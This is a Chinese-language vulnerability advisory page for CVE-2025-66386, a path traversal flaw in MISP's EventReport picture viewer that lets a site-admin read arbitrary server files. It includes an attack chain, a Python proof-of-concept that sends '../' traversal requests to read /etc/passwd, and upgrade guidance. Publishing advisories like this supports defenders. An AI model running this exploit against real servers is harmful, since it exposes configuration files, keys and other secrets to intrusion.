IPBUF安全漏洞报告
English
CVE-2025-66386 CVSS 4.1 中危

CVE-2025-66386 MISP 路径遍历漏洞 (site-admin权限)

披露日期: 2025-11-28
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-66386
漏洞类型
路径遍历
CVSS评分
4.1 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
MISP

相关标签

路径遍历MISPCVE-2025-66386文件读取权限提升EventReportsite-admin

漏洞概述

CVE-2025-66386是MISP(Malware Information Sharing Platform)系统中的一个路径遍历安全漏洞。该漏洞存在于app/Model/EventReport.php文件中的view picture功能中,攻击者(需具备site-admin高权限)可通过构造特殊的文件路径参数,利用路径遍历技术(如使用../)访问服务器上的任意文件。漏洞影响MISP 2.5.27之前的所有版本,CVSS评分4.1,属于中等严重程度。虽然该漏洞需要高权限用户触发,但成功利用可能导致敏感配置文件、日志文件或其他系统文件的泄露,对系统机密性造成一定影响。

技术细节

该路径遍历漏洞存在于MISP的EventReport组件中,具体位于app/Model/EventReport.php文件的view picture功能。当site-admin用户请求查看图片时,系统未对用户提供的文件路径参数进行充分的路径安全校验。攻击者可以通过在路径参数中插入../等目录遍历序列,配合精心构造的文件名,突破预期的文件访问边界,读取服务器上的任意文件。攻击成功的关键条件包括:1)攻击者需拥有site-admin权限;2)目标文件路径需在服务器可访问范围内;3)web服务器进程需对目标文件具有读取权限。建议通过官方提供的commit(7f4a0386d38672eddc139f5735d71c3b749623ce)进行修复,升级至v2.5.27版本。

攻击链分析

STEP 1
步骤1
攻击者获取MISP系统的site-admin账户访问权限
STEP 2
步骤2
攻击者构造包含路径遍历序列(如../../../)的恶意文件路径参数
STEP 3
步骤3
通过/eventReports/viewPicture接口发送精心构造的请求
STEP 4
步骤4
服务器未正确校验路径参数,攻击者成功访问服务器任意文件
STEP 5
步骤5
攻击者获取敏感信息(如配置文件、密钥、日志等)

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import urllib.parse # CVE-2025-66386 Path Traversal PoC for MISP < 2.5.27 # Target: MISP instance with site-admin access def exploit_path_traversal(target_url, session_cookie, target_file): """ Exploit path traversal in MISP EventReport view picture function Args: target_url: Base URL of MISP instance session_cookie: Valid site-admin session cookie target_file: File to read (e.g., /etc/passwd) Returns: File contents if successful, None otherwise """ # Construct path traversal payload # Using URL encoding to bypass basic filters traversal = "../../../../.." + target_file encoded_path = urllib.parse.quote(traversal, safe='') # Target endpoint for EventReport view picture endpoint = f"{target_url}/eventReports/viewPicture" headers = { 'Cookie': f'MISPISPSESSID={session_cookie}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Payload with path traversal params = { 'event_id': '1', 'id': '1', 'path': encoded_path } try: response = requests.get(endpoint, params=params, headers=headers, timeout=10) if response.status_code == 200 and len(response.content) > 0: return response.content else: return None except requests.exceptions.RequestException as e: print(f"Request failed: {e}") return None # Example usage if __name__ == "__main__": target = "https://vulnerable-misp-server.com" cookie = "your_site_admin_session_cookie" file_to_read = "/etc/passwd" result = exploit_path_traversal(target, cookie, file_to_read) if result: print(f"File contents:\n{result.decode('utf-8', errors='ignore')}") else: print("Exploitation failed or file not accessible")

影响范围

MISP < 2.5.27

防御指南

临时缓解措施
立即将MISP升级至v2.5.27版本以修复该路径遍历漏洞。在升级前,可通过限制site-admin账户数量、加强会话管理和监控异常文件访问请求来降低风险。同时建议审查并限制Web服务器进程对敏感目录的访问权限。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表